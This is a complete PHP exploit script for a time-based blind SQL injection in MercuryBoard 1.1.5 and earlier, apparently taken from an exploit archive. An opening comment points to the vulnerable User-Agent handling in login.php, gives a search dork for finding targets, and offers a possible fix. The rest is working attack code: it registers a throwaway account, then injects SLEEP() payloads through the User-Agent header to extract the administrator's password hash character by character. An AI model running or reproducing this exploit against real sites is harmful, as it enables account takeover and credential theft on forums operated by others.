mercuryboard-blindsql.txt

`<?php  
  
/*  
--------------------------------------------------------------------  
MercuryBoard <= 1.1.5 (login.php) Remote Blind SQL Injection Exploit  
--------------------------------------------------------------------  
  
author...: EgiX  
mail.....: n0b0d13s[at]gmail[dot]com  
  
link.....: http://www.mercuryboard.com/  
dork.....: "Powered by MercuryBoard"  
details..: SLEEP() function was added in MySQL 5.0.12, so this PoC works depending on the version of MySQL  
  
[-] do_login() function vulnerable to SQL injection in /func/login.php  
  
52. function do_login()  
53. {  
54. $this->set_title($this->lang->login_header);  
55. $this->tree($this->lang->login_header);  
56.   
57. //print "agent: $this->agent\n";  
58.   
59. if (!isset($this->post['submit'])) {  
60. $request_uri = $this->get_uri();  
61.   
62. if (substr($request_uri, -8) == 'register') {  
63. $request_uri = $this->self;  
64. }  
65.   
66. return eval($this->template('LOGIN_MAIN'));  
67. } else {  
68. $username = str_replace('\\', '\', $this->format(stripslashes($this->post['user']), FORMAT_HTMLCHARS | FORMAT_CENSOR));  
69.   
70. $data = $this->db->fetch("SELECT user_id, user_password FROM {$this->pre}users WHERE REPLACE(LOWER(user_name), ' ', '')='" . str_replace(' ', '', strtolower($username)) . '\' AND user_id != ' . USER_GUEST_UID . ' LIMIT 1');  
71. $pass = $data['user_password'];  
72. $user = $data['user_id'];  
73.   
74. $this->post['pass'] = str_replace('$', '', $this->post['pass']);  
75. $this->post['pass'] = md5($this->post['pass']);  
76.   
77. if ($this->post['pass'] == $pass) {  
78. if (!setcookie($this->sets['cookie_prefix'] . 'user', $user, $this->time + $this->sets['logintime'], $this->sets['cookie_path'])  
79. || !setcookie($this->sets['cookie_prefix'] . 'pass', $pass, $this->time + $this->sets['logintime'], $this->sets['cookie_path'])) {  
80. return $this->message($this->lang->login_header, $this->lang->login_cookies);  
81. }  
82.   
83. // Delete guest entry  
84. $this->db->query("DELETE FROM {$this->pre}active WHERE active_ip='$this->ip' AND active_user_agent='$this->agent'"); <=======  
85.   
86. return $this->message($this->lang->login_header, $this->lang->login_logged, $this->lang->main_continue, str_replace('&', '&', $this->post['request_uri']), $this->post['request_uri']);  
  
$this->agent (User-Agent header) isn't properly sanitised, so an attacker could be inject arbitrary SQL code in a subquery into the query at line 84  
  
[-] Possible bug fix in /global.php  
  
66. function mercuryboard()  
67. {  
68. $this->time = time();  
69. $this->query = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : null;  
70. $this->ip = $_SERVER['REMOTE_ADDR'];  
71. $this->agent = isset($_SERVER['HTTP_USER_AGENT']) ? addslashes($_SERVER['HTTP_USER_AGENT']) : null; <=======  
72. $this->self = $_SERVER['PHP_SELF'];  
73. $this->server = $_SERVER;  
*/  
  
error_reporting(0);  
set_time_limit(0);  
ini_set("default_socket_timeout", 5);  
  
function http_send($host, $packet)  
{  
$sock = fsockopen($host, 80);  
while (!$sock)  
{  
print "\n[-] No response from {$host}:80 Trying again...";  
$sock = fsockopen($host, 80);  
}  
fputs($sock, $packet);  
while (!feof($sock)) $resp .= fread($sock, 1024);  
fclose($sock);  
return $resp;  
}  
  
function getmicrotime()  
{   
list($usec, $sec) = explode(" ", microtime());   
return ((float)$usec + (float)$sec);   
}  
  
function getdelay($query)  
{  
global $host, $path, $username, $password;  
  
$data = "user={$username}&pass={$password}&submit=1&request_uri=foo";  
$packet = "POST {$path}index.php?a=login HTTP/1.0\r\n";  
$packet.= "Host: {$host}\r\n";  
$packet.= "User-Agent: {$query}\r\n";  
$packet.= "Content-Length: ".strlen($data)."\r\n";  
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";  
$packet.= "Connection: close\r\n\r\n";  
$packet.= $data;  
  
$start = getmicrotime()*1000;  
http_send($host, $packet);  
$end = getmicrotime()*1000;  
  
return ($end - $start);  
}  
  
function getusername($uid)  
{  
global $host, $path;  
  
$packet = "GET {$path}index.php?a=profile&w={$uid} HTTP/1.0\r\n";  
$packet.= "Host: {$host}\r\n";  
$packet.= "Connection: close\r\n\r\n";  
preg_match("/Viewing Profile: (.*)<\/td>/i", http_send($host, $packet), $split);  
  
return $split[1];  
}  
  
function register()  
{  
global $host, $path, $username, $password;  
  
$data = "desuser={$username}&[email protected]&passA={$password}&passB={$password}&submit=1";  
$packet = "POST {$path}index.php?a=register HTTP/1.0\r\n";  
$packet.= "Host: {$host}\r\n";  
$packet.= "Content-Length: ".strlen($data)."\r\n";  
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";  
$packet.= "Connection: close\r\n\r\n";  
$packet.= $data;  
  
http_send($host, $packet);  
}  
  
function login()  
{  
global $host, $path, $username, $password;  
  
$data = "user={$username}&pass={$password}&submit=1&request_uri=foo";  
$packet = "POST {$path}index.php?a=login HTTP/1.0\r\n";  
$packet.= "Host: {$host}\r\n";  
$packet.= "Content-Length: ".strlen($data)."\r\n";  
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";  
$packet.= "Connection: close\r\n\r\n";  
$packet.= $data;  
  
$pattern = "/pass=".md5($password)."/";  
  
return preg_match($pattern, http_send($host, $packet));   
}  
  
print "\n+------------------------------------------------------------------+";  
print "\n| MercuryBoard <= 1.1.5 Remote Blind SQL Injection Exploit by EgiX |";  
print "\n+------------------------------------------------------------------+\n";  
  
if ($argc < 3)  
{  
print "\nUsage......: php $argv[0] host path [options]\n";  
print "\nhost.......: target server (ip/hostname)";  
print "\npath.......: path to MercuryBoard directory (example: / or /mercury/)\n";  
print "\n-s seconds.: number of seconds for SLEEP() (dafault: 5)";  
print "\n-u uid.....: user id (default: 2 - admin)";  
print "\n-t prefix..: table's prefix (default: mb)\n";  
print "\nExample....: php $argv[0] localhost /mercury/ -s 1";  
print "\nExample....: php $argv[0] localhost / -u 3 -t my_prefix\n";  
die();  
}  
  
$host = $argv[1];  
$path = $argv[2];  
  
$username = "pr00f_0f";  
$password = "_c0nc3pt";  
  
$opt = array("-s", "-u", "-t");  
$md5 = "";  
$count = "5";  
$uid = "2";  
$prefix = "mb";  
  
for ($i = 3; $i < $argc; $i++)  
{  
if ($argv[$i] == "-s") if (isset($argv[$i+1]) && !in_array($argv[$i+1], $opt)) $count = $argv[++$i];  
if ($argv[$i] == "-u") if (isset($argv[$i+1]) && !in_array($argv[$i+1], $opt)) $uid = $argv[++$i];  
if ($argv[$i] == "-t") if (isset($argv[$i+1]) && !in_array($argv[$i+1], $opt)) $prefix = $argv[++$i];   
}  
  
if (!login())  
{  
print "\n[-] Trying to register with username '{$username}' and password '{$password}'\n";  
register();  
if (!login()) die("\n[-] Login failed!\n");  
}  
  
$user = getusername($uid);  
print "\n[-] Username: {$user}";  
  
$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);  
$index = 1; $md5 = "";  
print "\n[-] MD5 Hash: ";  
  
while (!strpos($md5, chr(0)))  
{  
for ($i = 0, $n = count($hash); $i <= $n; $i++)  
{  
if ($i == $n) die("\n\n[-] Exploit failed...\n");  
$sql = "'OR(SELECT IF(ORD(SUBSTR(user_password,{$index},1))={$hash[$i]},SLEEP({$count}),1) FROM {$prefix}_users WHERE user_id={$uid})#";  
if (getdelay($sql) >= ($count * 1000)) { $md5 .= chr($hash[$i]); print chr($hash[$i]); break; }  
}  
  
$index++;  
}  
  
if (!eregi("[0-9,a-f]{32}", $md5)) print "\n\n[-] Invalid MD5 hash...\n";  
else print "\n\n[-] Successfull!\n";  
  
?>  
  
`